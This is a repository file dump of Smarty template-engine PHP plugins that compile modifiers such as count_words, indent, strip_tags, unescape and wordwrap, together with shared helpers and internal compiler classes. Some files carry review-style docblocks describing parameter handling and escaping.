13 | * Purpose: count the number of characters in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.characters.php count_characters (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_characters($params) 23 | { 24 | if (!isset($params[1]) || $params[1] != 'true') { 25 | return 'preg_match_all(\'/[^\s]/' . Smarty::$_UTF8_MODIFIER . '\',' . $params[0] . ', $tmp)'; 26 | } 27 | if (Smarty::$_MBSTRING) { 28 | return 'mb_strlen(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')'; 29 | } 30 | // no MBString fallback 31 | return 'strlen(' . $params[0] . ')'; 32 | } 33 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_paragraphs.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_paragraphs
13 | * Purpose: count the number of paragraphs in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 16 | * count_paragraphs (Smarty online manual) 17 | * @author Uwe Tews 18 | * 19 | * @param array $params parameters 20 | * 21 | * @return string with compiled code 22 | */ 23 | function smarty_modifiercompiler_count_paragraphs($params) 24 | { 25 | // count \r or \n characters 26 | return '(preg_match_all(\'#[\r\n]+#\', ' . $params[0] . ', $tmp)+1)'; 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_sentences.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_sentences 13 | * Purpose: count the number of sentences in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 16 | * count_sentences (Smarty online manual) 17 | * @author Uwe Tews 18 | * 19 | * @param array $params parameters 20 | * 21 | * @return string with compiled code 22 | */ 23 | function smarty_modifiercompiler_count_sentences($params) 24 | { 25 | // find periods, question marks, exclamation marks with a word before but not after. 26 | return 'preg_match_all("#\w[\.\?\!](\W|$)#S' . Smarty::$_UTF8_MODIFIER . '", ' . $params[0] . ', $tmp)'; 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_words.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_words
13 | * Purpose: count the number of words in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.words.php count_words (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_words($params) 23 | { 24 | if (Smarty::$_MBSTRING) { 25 | // return 'preg_match_all(\'#[\w\pL]+#' . Smarty::$_UTF8_MODIFIER . '\', ' . $params[0] . ', $tmp)'; 26 | // expression taken from http://de.php.net/manual/en/function.str-word-count.php#85592 27 | return 'preg_match_all(\'/\p{L}[\p{L}\p{Mn}\p{Pd}\\\'\x{2019}]*/' . Smarty::$_UTF8_MODIFIER . '\', ' . $params[0] . ', $tmp)'; 28 | } 29 | // no MBString fallback 30 | return 'str_word_count(' . $params[0] . ')'; 31 | } 32 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.default.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: default
13 | * Purpose: designate default value for empty variables 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.default.php default (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_default($params) 23 | { 24 | $output = $params[0]; 25 | if (!isset($params[1])) { 26 | $params[1] = "''"; 27 | } 28 | 29 | array_shift($params); 30 | foreach ($params as $param) { 31 | $output = '(($tmp = @' . $output . ')===null||$tmp===\'\' ? ' . $param . ' : $tmp)'; 32 | } 33 | 34 | return $output; 35 | } 36 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.from_charset.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: from_charset
13 | * Purpose: convert character encoding from $charset to internal encoding 14 | * 15 | * @author Rodney Rehm 16 | * 17 | * @param array $params parameters 18 | * 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_from_charset($params) 22 | { 23 | if (!Smarty::$_MBSTRING) { 24 | // FIXME: (rodneyrehm) shouldn't this throw an error? 25 | return $params[0]; 26 | } 27 | 28 | if (!isset($params[1])) { 29 | $params[1] = '"ISO-8859-1"'; 30 | } 31 | 32 | return 'mb_convert_encoding(' . $params[0] . ', "' . addslashes(Smarty::$_CHARSET) . '", ' . $params[1] . ')'; 33 | } 34 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.indent.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: indent
/**
 * Smarty indent modifier plugin (compile-time part)
 * Purpose:  indent lines of text
 *
 * The generated code prefixes every line start (multiline "^") with the
 * indent string repeated the requested number of times. All three parameters
 * are inserted into the generated PHP unchanged; nothing here checks that the
 * repeat count is numeric.
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.indent.php indent (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the text expression,
 *                      $params[1] the repeat count (default 4),
 *                      $params[2] the indent string expression (default ' ')
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_indent($params)
{
    // fill in the optional arguments
    $params[1] = isset($params[1]) ? $params[1] : 4;
    $params[2] = isset($params[2]) ? $params[2] : "' '";

    return 'preg_replace(\'!^!m\',str_repeat(' . $params[2] . ',' . $params[1] . '),' . $params[0] . ')';
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.lower.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: lower
/**
 * Smarty lower modifier plugin (compile-time part)
 * Purpose:  convert string to lowercase
 *
 * $params[0] is inserted into the generated PHP unchanged. On the mbstring
 * path the internal charset is passed through addslashes() before it is
 * placed in a single-quoted literal.
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.lower.php lower (Smarty online manual)
 * @author Monte Ohrt
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the expression to lowercase
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_lower($params)
{
    if (!Smarty::$_MBSTRING) {
        // no MBString fallback
        return 'strtolower(' . $params[0] . ')';
    }

    return 'mb_strtolower(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')';
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.noprint.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: noprint
/**
 * Smarty noprint modifier plugin (compile-time part)
 * Purpose:  return an empty string
 *
 * Takes no parameters: whatever expression the modifier was applied to is
 * replaced by a PHP empty-string literal in the generated code.
 *
 * @author Uwe Tews
 * @return string with compiled code
 */
function smarty_modifiercompiler_noprint()
{
    // two single quotes, i.e. the source text of an empty PHP string
    $emptyLiteral = "''";

    return $emptyLiteral;
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.string_format.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: string_format
/**
 * Smarty string_format modifier plugin (compile-time part)
 * Purpose:  format strings via sprintf
 *
 * Both parameters are inserted into the generated sprintf() call unchanged.
 * No default is supplied for the format: when $params[1] is missing the
 * emitted call has an empty first argument and is not valid PHP.
 * NOTE(review): the format comes from the template, so a template author
 * fully controls the sprintf() format string.
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.string.format.php string_format (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the value expression,
 *                      $params[1] the format expression
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_string_format($params)
{
    // sprintf() takes the format first, the value second
    $format = $params[1];
    $value = $params[0];

    return 'sprintf(' . $format . ',' . $value . ')';
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.strip.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: strip
/**
 * Smarty strip modifier plugin (compile-time part)
 * Purpose:  Replace all repeated spaces, newlines, tabs
 *           with a single space or supplied replacement string.
 * Example:  {$var|strip} {$var|strip:" "}
 * Date:     September 25th, 2002
 *
 * $params[0] and $params[1] are interpolated into the generated
 * preg_replace() call unchanged; Smarty::$_UTF8_MODIFIER is appended to the
 * pattern as its modifier.
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.strip.php strip (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the text expression,
 *                      $params[1] the replacement expression (default ' ')
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_strip($params)
{
    // replacement defaults to a single-space string literal
    $params[1] = isset($params[1]) ? $params[1] : "' '";

    return "preg_replace('!\s+!" . Smarty::$_UTF8_MODIFIER . "', {$params[1]},{$params[0]})";
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.strip_tags.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: strip_tags
/**
 * Smarty strip_tags modifier plugin (compile-time part)
 * Purpose:  strip html tags from text
 *
 * With no second parameter, or a second parameter of true / "true", each
 * "<...>" run is replaced by a single space through a regular expression;
 * any other value selects PHP's strip_tags().
 * Neither branch is an output-encoding step: removing tags is a text
 * formatting aid, and a value that ends up in HTML still has to be escaped
 * for the context it is written into.
 *
 * @link   http://www.smarty.net/manual/en/language.modifier.strip.tags.php strip_tags (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the text expression,
 *                      $params[1] the optional "replace with space" flag
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_strip_tags($params)
{
    $replaceWithSpace = !isset($params[1]) || $params[1] === true || trim($params[1], '"') == 'true';
    if (!$replaceWithSpace) {
        return 'strip_tags(' . $params[0] . ')';
    }

    return "preg_replace('!<[^>]*?>!', ' ', {$params[0]})";
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.to_charset.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: to_charset
/**
 * Smarty to_charset modifier plugin (compile-time part)
 * Purpose:  convert character encoding from internal encoding to $charset
 *
 * Without mbstring the input expression is returned untouched, so the
 * template silently renders unconverted text. The internal charset is passed
 * through addslashes() before being placed in the generated string literal;
 * $params[0] and $params[1] are inserted into the generated PHP unchanged.
 *
 * @author Rodney Rehm
 *
 * @param array $params parameters; $params[0] is the expression to convert,
 *                      $params[1] the target charset expression (default "ISO-8859-1")
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_to_charset($params)
{
    if (Smarty::$_MBSTRING) {
        $params[1] = isset($params[1]) ? $params[1] : '"ISO-8859-1"';

        return 'mb_convert_encoding(' . $params[0] . ', ' . $params[1] . ', "' . addslashes(Smarty::$_CHARSET) . '")';
    }

    // FIXME: (rodneyrehm) shouldn't this throw an error?
    return $params[0];
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.unescape.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: unescape
/**
 * Smarty unescape modifier plugin (compile-time part)
 * Purpose:  unescape html entities
 *
 * The generated call decodes entities or percent-encoding, so its result is
 * raw text again: if that result is written into HTML it has to be escaped
 * once more for the output context.
 * An unrecognised mode returns the input expression unchanged.
 *
 * @author Rodney Rehm
 *
 * @param array $params parameters; $params[0] is the expression to decode,
 *                      $params[1] the mode (entity, htmlall, html, url; default html),
 *                      $params[2] the charset (default: internal charset)
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_unescape($params)
{
    if (!isset($params[1])) {
        $params[1] = 'html';
    }

    // NOTE(review): a supplied charset is wrapped in single quotes without
    // escaping; if the caller already hands over a quoted literal the emitted
    // code carries doubled quotes - confirm against the caller.
    $params[2] = isset($params[2])
        ? "'" . $params[2] . "'"
        : '\'' . addslashes(Smarty::$_CHARSET) . '\'';

    // the mode may arrive with its quotes still attached
    $mode = trim($params[1], '"\'');

    if ($mode == 'entity' || $mode == 'htmlall') {
        if (Smarty::$_MBSTRING) {
            return 'mb_convert_encoding(' . $params[0] . ', ' . $params[2] . ', \'HTML-ENTITIES\')';
        }

        return 'html_entity_decode(' . $params[0] . ', ENT_NOQUOTES, ' . $params[2] . ')';
    }

    if ($mode == 'html') {
        return 'htmlspecialchars_decode(' . $params[0] . ', ENT_QUOTES)';
    }

    if ($mode == 'url') {
        return 'rawurldecode(' . $params[0] . ')';
    }

    return $params[0];
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.upper.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: lower
/**
 * Smarty upper modifier plugin (compile-time part)
 * Purpose:  convert string to uppercase
 *
 * $params[0] is inserted into the generated PHP unchanged. On the mbstring
 * path the internal charset is passed through addslashes() before it is
 * placed in a single-quoted literal.
 *
 * @link   http://smarty.php.net/manual/en/language.modifier.upper.php upper (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params parameters; $params[0] is the expression to uppercase
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_upper($params)
{
    if (!Smarty::$_MBSTRING) {
        // no MBString fallback
        return 'strtoupper(' . $params[0] . ')';
    }

    return 'mb_strtoupper(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')';
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/modifiercompiler.wordwrap.php:
--------------------------------------------------------------------------------
1 | 12 | * Name: wordwrap
/**
 * Smarty wordwrap modifier plugin (compile-time part)
 * Purpose:  wrap a string of text at a given length
 *
 * With mbstring available the generated code calls smarty_mb_wordwrap() and
 * this function registers shared.mb_wordwrap.php as a required plugin of the
 * template, under 'nocache' or 'compiled' depending on the caching state;
 * otherwise PHP's wordwrap() is used. All four parameters are inserted into
 * the generated call unchanged.
 *
 * @link   http://smarty.php.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual)
 * @author Uwe Tews
 *
 * @param array $params   parameters; $params[0] is the text expression,
 *                        $params[1] the width (default 80),
 *                        $params[2] the break string expression (default "\n"),
 *                        $params[3] the cut flag (default false)
 * @param       $compiler compiler object whose template->required_plugins is updated
 *
 * @return string with compiled code
 */
function smarty_modifiercompiler_wordwrap($params, $compiler)
{
    // fill in the optional arguments
    $defaults = array(1 => 80, 2 => '"\n"', 3 => 'false');
    foreach ($defaults as $index => $default) {
        if (!isset($params[$index])) {
            $params[$index] = $default;
        }
    }

    if (Smarty::$_MBSTRING) {
        // the multibyte helper lives in a shared plugin file that the compiled template has to load
        $scope = ($compiler->template->caching && ($compiler->tag_nocache | $compiler->nocache)) ? 'nocache' : 'compiled';
        $compiler->template->required_plugins[$scope]['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR . 'shared.mb_wordwrap.php';
        $compiler->template->required_plugins[$scope]['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap';
        $function = 'smarty_mb_wordwrap';
    } else {
        $function = 'wordwrap';
    }

    return $function . '(' . $params[0] . ',' . $params[1] . ',' . $params[2] . ',' . $params[3] . ')';
}
--------------------------------------------------------------------------------
/easyWEB/web1/html/org/smarty/plugins/shared.escape_special_chars.php:
--------------------------------------------------------------------------------
1 | =')) { 10 | /** 11 | * escape_special_chars common function 12 | * Function: smarty_function_escape_special_chars
13 | * Purpose: used by other smarty functions to escape 14 | * special chars except for already escaped ones 15 | * 16 | * @author Monte Ohrt 17 | * 18 | * @param string $string text that should by escaped 19 | * 20 | * @return string 21 | */ 22 | function smarty_function_escape_special_chars($string) 23 | { 24 | if (!is_array($string)) { 25 | $string = htmlspecialchars($string, ENT_COMPAT, Smarty::$_CHARSET, false); 26 | } 27 | 28 | return $string; 29 | } 30 | } else { 31 | /** 32 | * escape_special_chars common function 33 | * Function: smarty_function_escape_special_chars
34 | * Purpose: used by other smarty functions to escape 35 | * special chars except for already escaped ones 36 | * 37 | * @author Monte Ohrt 38 | * 39 | * @param string $string text that should by escaped 40 | * 41 | * @return string 42 | */ 43 | function smarty_function_escape_special_chars($string) 44 | { 45 | if (!is_array($string)) { 46 | $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); 47 | $string = htmlspecialchars($string); 48 | $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); 49 | } 50 | 51 | return $string; 52 | } 53 | } 54 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/shared.literal_compiler_param.php: -------------------------------------------------------------------------------- 1 | 11 | * Purpose: used by other smarty functions to make a timestamp from a string. 12 | * 13 | * @author Monte Ohrt 14 | * 15 | * @param DateTime|int|string $string date object, timestamp or string that can be converted using strtotime() 16 | * 17 | * @return int 18 | */ 19 | function smarty_make_timestamp($string) 20 | { 21 | if (empty($string)) { 22 | // use "now": 23 | return time(); 24 | } elseif ($string instanceof DateTime) { 25 | return $string->getTimestamp(); 26 | } elseif (strlen($string) == 14 && ctype_digit($string)) { 27 | // it is mysql timestamp format of YYYYMMDDHHMMSS? 
28 | return mktime(substr($string, 8, 2), substr($string, 10, 2), substr($string, 12, 2), 29 | substr($string, 4, 2), substr($string, 6, 2), substr($string, 0, 4)); 30 | } elseif (is_numeric($string)) { 31 | // it is a numeric string, we handle it as timestamp 32 | return (int) $string; 33 | } else { 34 | // strtotime should handle it 35 | $time = strtotime($string); 36 | if ($time == - 1 || $time === false) { 37 | // strtotime() was not able to parse $string, use "now": 38 | return time(); 39 | } 40 | 41 | return $time; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/shared.mb_str_replace.php: -------------------------------------------------------------------------------- 1 | $width) { 37 | if ($cut) { 38 | $_tokens = preg_split('!(.{' . $width . '})!S' . Smarty::$_UTF8_MODIFIER, $_token, - 1, PREG_SPLIT_NO_EMPTY + PREG_SPLIT_DELIM_CAPTURE); 39 | } 40 | } 41 | 42 | foreach ($_tokens as $token) { 43 | $_space = !!preg_match('!^\s$!S' . Smarty::$_UTF8_MODIFIER, $token); 44 | $token_length = mb_strlen($token, Smarty::$_CHARSET); 45 | $length += $token_length; 46 | 47 | if ($length > $width) { 48 | // remove space before inserted break 49 | if ($_previous) { 50 | $t = mb_substr($t, 0, - 1, Smarty::$_CHARSET); 51 | } 52 | 53 | if (!$_space) { 54 | // add the break before the token 55 | if (!empty($t)) { 56 | $t .= $break; 57 | } 58 | $length = $token_length; 59 | } 60 | } elseif ($token == "\n") { 61 | // hard break must reset counters 62 | $_previous = 0; 63 | $length = 0; 64 | } 65 | $_previous = $_space; 66 | // add the token 67 | $t .= $token; 68 | } 69 | } 70 | 71 | return $t; 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/variablefilter.htmlspecialchars.php: -------------------------------------------------------------------------------- 1 | dataObjectName = 'Data_object ' . 
(isset($name) ? "'{$name}'" : self::$count); 53 | $this->smarty = $smarty; 54 | if (is_object($_parent)) { 55 | // when object set up back pointer 56 | $this->parent = $_parent; 57 | } elseif (is_array($_parent)) { 58 | // set up variable values 59 | foreach ($_parent as $_key => $_val) { 60 | $this->tpl_vars[$_key] = new Smarty_Variable($_val); 61 | } 62 | } elseif ($_parent != null) { 63 | throw new SmartyException("Wrong type for template variables"); 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_append.php: -------------------------------------------------------------------------------- 1 | required_attributes = array('var', 'value'); 32 | $this->shorttag_order = array('var', 'value'); 33 | $this->optional_attributes = array('scope', 'index'); 34 | // check and get attributes 35 | $_attr = $this->getAttributes($compiler, $args); 36 | // map to compile assign attributes 37 | if (isset($_attr['index'])) { 38 | $_params['smarty_internal_index'] = '[' . $_attr['index'] . 
']'; 39 | unset($_attr['index']); 40 | } else { 41 | $_params['smarty_internal_index'] = '[]'; 42 | } 43 | $_new_attr = array(); 44 | foreach ($_attr as $key => $value) { 45 | $_new_attr[] = array($key => $value); 46 | } 47 | // call compile assign 48 | return parent::compile($_new_attr, $compiler, $_params); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_break.php: -------------------------------------------------------------------------------- 1 | true, 'foreach' => true, 'while' => true, 'section' => true); 46 | // check and get attributes 47 | $_attr = $this->getAttributes($compiler, $args); 48 | 49 | if ($_attr['nocache'] === true) { 50 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 51 | } 52 | 53 | if (isset($_attr['levels'])) { 54 | if (!is_numeric($_attr['levels'])) { 55 | $compiler->trigger_template_error('level attribute must be a numeric constant', $compiler->lex->taglineno); 56 | } 57 | $_levels = $_attr['levels']; 58 | } else { 59 | $_levels = 1; 60 | } 61 | $level_count = $_levels; 62 | $stack_count = count($compiler->_tag_stack) - 1; 63 | while ($level_count > 0 && $stack_count >= 0) { 64 | if (isset($_is_loopy[$compiler->_tag_stack[$stack_count][0]])) { 65 | $level_count --; 66 | } 67 | $stack_count --; 68 | } 69 | if ($level_count != 0) { 70 | $compiler->trigger_template_error("cannot break {$_levels} level(s)", $compiler->lex->taglineno); 71 | } 72 | 73 | return ""; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_config_load.php: -------------------------------------------------------------------------------- 1 | true, 'parent' => true, 'root' => true, 'global' => true); 52 | // check and get attributes 53 | $_attr = $this->getAttributes($compiler, $args); 54 | 55 | if 
($_attr['nocache'] === true) { 56 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 57 | } 58 | 59 | // save possible attributes 60 | $conf_file = $_attr['file']; 61 | if (isset($_attr['section'])) { 62 | $section = $_attr['section']; 63 | } else { 64 | $section = 'null'; 65 | } 66 | $scope = 'local'; 67 | // scope setup 68 | if (isset($_attr['scope'])) { 69 | $_attr['scope'] = trim($_attr['scope'], "'\""); 70 | if (isset($_is_legal_scope[$_attr['scope']])) { 71 | $scope = $_attr['scope']; 72 | } else { 73 | $compiler->trigger_template_error('illegal value for "scope" attribute', $compiler->lex->taglineno); 74 | } 75 | } 76 | // create config object 77 | $_output = ""; 78 | 79 | return $_output; 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_continue.php: -------------------------------------------------------------------------------- 1 | true, 'foreach' => true, 'while' => true, 'section' => true); 46 | // check and get attributes 47 | $_attr = $this->getAttributes($compiler, $args); 48 | 49 | if ($_attr['nocache'] === true) { 50 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 51 | } 52 | 53 | if (isset($_attr['levels'])) { 54 | if (!is_numeric($_attr['levels'])) { 55 | $compiler->trigger_template_error('level attribute must be a numeric constant', $compiler->lex->taglineno); 56 | } 57 | $_levels = $_attr['levels']; 58 | } else { 59 | $_levels = 1; 60 | } 61 | $level_count = $_levels; 62 | $stack_count = count($compiler->_tag_stack) - 1; 63 | while ($level_count > 0 && $stack_count >= 0) { 64 | if (isset($_is_loopy[$compiler->_tag_stack[$stack_count][0]])) { 65 | $level_count --; 66 | } 67 | $stack_count --; 68 | } 69 | if ($level_count != 0) { 70 | $compiler->trigger_template_error("cannot continue {$_levels} level(s)", $compiler->lex->taglineno); 71 | } 72 | 
73 | return ""; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_debug.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 32 | 33 | // compile always as nocache 34 | $compiler->tag_nocache = true; 35 | 36 | // display debug template 37 | $_output = "smarty->loadPlugin('Smarty_Internal_Debug'); Smarty_Internal_Debug::display_debug(\$_smarty_tpl); ?>"; 38 | 39 | return $_output; 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_eval.php: -------------------------------------------------------------------------------- 1 | required_attributes = array('var'); 52 | $this->optional_attributes = array('assign'); 53 | // check and get attributes 54 | $_attr = $this->getAttributes($compiler, $args); 55 | if (isset($_attr['assign'])) { 56 | // output will be stored in a smarty variable instead of being displayed 57 | $_assign = $_attr['assign']; 58 | } 59 | 60 | // create template object 61 | $_output = "\$_template = new {$compiler->smarty->template_class}('eval:'." . $_attr['var'] . ", \$_smarty_tpl->smarty, \$_smarty_tpl);"; 62 | //was there an assign attribute? 
63 | if (isset($_assign)) { 64 | $_output .= "\$_smarty_tpl->assign($_assign,\$_template->fetch());"; 65 | } else { 66 | $_output .= "echo \$_template->fetch();"; 67 | } 68 | 69 | return ""; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_ldelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | 37 | return $compiler->smarty->left_delimiter; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_nocache.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 38 | $this->openTag($compiler, 'nocache', array($compiler->nocache)); 39 | // enter nocache mode 40 | $compiler->nocache = true; 41 | // this tag does not return compiled code 42 | $compiler->has_code = false; 43 | 44 | return true; 45 | } 46 | } 47 | 48 | /** 49 | * Smarty Internal Plugin Compile Nocacheclose Class 50 | * 51 | * @package Smarty 52 | * @subpackage Compiler 53 | */ 54 | class Smarty_Internal_Compile_Nocacheclose extends Smarty_Internal_CompileBase 55 | { 56 | /** 57 | * Compiles code for the {/nocache} tag 58 | * This tag does not generate compiled output. It only sets a compiler flag. 
59 | * 60 | * @param array $args array with attributes from parser 61 | * @param object $compiler compiler object 62 | * 63 | * @return bool 64 | */ 65 | public function compile($args, $compiler) 66 | { 67 | $_attr = $this->getAttributes($compiler, $args); 68 | // leave nocache mode 69 | list($compiler->nocache) = $this->closeTag($compiler, array('nocache')); 70 | // this tag does not return compiled code 71 | $compiler->has_code = false; 72 | 73 | return true; 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_private_function_plugin.php: -------------------------------------------------------------------------------- 1 | has_output = true; 49 | 50 | // check and get attributes 51 | $_attr = $this->getAttributes($compiler, $args); 52 | if ($_attr['nocache'] === true) { 53 | $compiler->tag_nocache = true; 54 | } 55 | unset($_attr['nocache']); 56 | // convert attributes into parameter array string 57 | $_paramsArray = array(); 58 | foreach ($_attr as $_key => $_value) { 59 | if (is_int($_key)) { 60 | $_paramsArray[] = "$_key=>$_value"; 61 | } else { 62 | $_paramsArray[] = "'$_key'=>$_value"; 63 | } 64 | } 65 | $_params = 'array(' . implode(",", $_paramsArray) . 
')'; 66 | // compile code 67 | $output = "\n"; 68 | 69 | return $output; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_rdelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | 37 | return $compiler->smarty->right_delimiter; 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_compile_setfilter.php: -------------------------------------------------------------------------------- 1 | variable_filter_stack[] = $compiler->template->variable_filters; 31 | $compiler->template->variable_filters = $parameter['modifier_list']; 32 | // this tag does not return compiled code 33 | $compiler->has_code = false; 34 | 35 | return true; 36 | } 37 | } 38 | 39 | /** 40 | * Smarty Internal Plugin Compile Setfilterclose Class 41 | * 42 | * @package Smarty 43 | * @subpackage Compiler 44 | */ 45 | class Smarty_Internal_Compile_Setfilterclose extends Smarty_Internal_CompileBase 46 | { 47 | /** 48 | * Compiles code for the {/setfilter} tag 49 | * This tag does not generate compiled output. It resets variable filter. 
50 | * 51 | * @param array $args array with attributes from parser 52 | * @param object $compiler compiler object 53 | * 54 | * @return string compiled code 55 | */ 56 | public function compile($args, $compiler) 57 | { 58 | $_attr = $this->getAttributes($compiler, $args); 59 | // reset variable filter to previous state 60 | if (count($compiler->variable_filter_stack)) { 61 | $compiler->template->variable_filters = array_pop($compiler->variable_filter_stack); 62 | } else { 63 | $compiler->template->variable_filters = array(); 64 | } 65 | // this tag does not return compiled code 66 | $compiler->has_code = false; 67 | 68 | return true; 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/sysplugins/smarty_internal_extension_defaulttemplatehandler.php: -------------------------------------------------------------------------------- 1 | isConfig) { 30 | $default_handler = $_template->smarty->default_config_handler_func; 31 | } else { 32 | $default_handler = $_template->smarty->default_template_handler_func; 33 | } 34 | $_content = $_timestamp = null; 35 | $_return = call_user_func_array($default_handler, 36 | array($source->type, $source->name, &$_content, &$_timestamp, $source->smarty)); 37 | if (is_string($_return)) { 38 | $source->exists = is_file($_return); 39 | if ($source->exists) { 40 | $source->timestamp = filemtime($_return); 41 | } 42 | $source->filepath = $_return; 43 | } elseif ($_return === true) { 44 | $source->content = $_content; 45 | $source->timestamp = $_timestamp; 46 | $source->exists = true; 47 | $source->recompiled = true; 48 | $source->filepath = false; 49 | } 50 | } 51 | 52 | /** 53 | * register template default handler 54 | * 55 | * @param Smarty $smarty 56 | * @param mixed $callback 57 | * 58 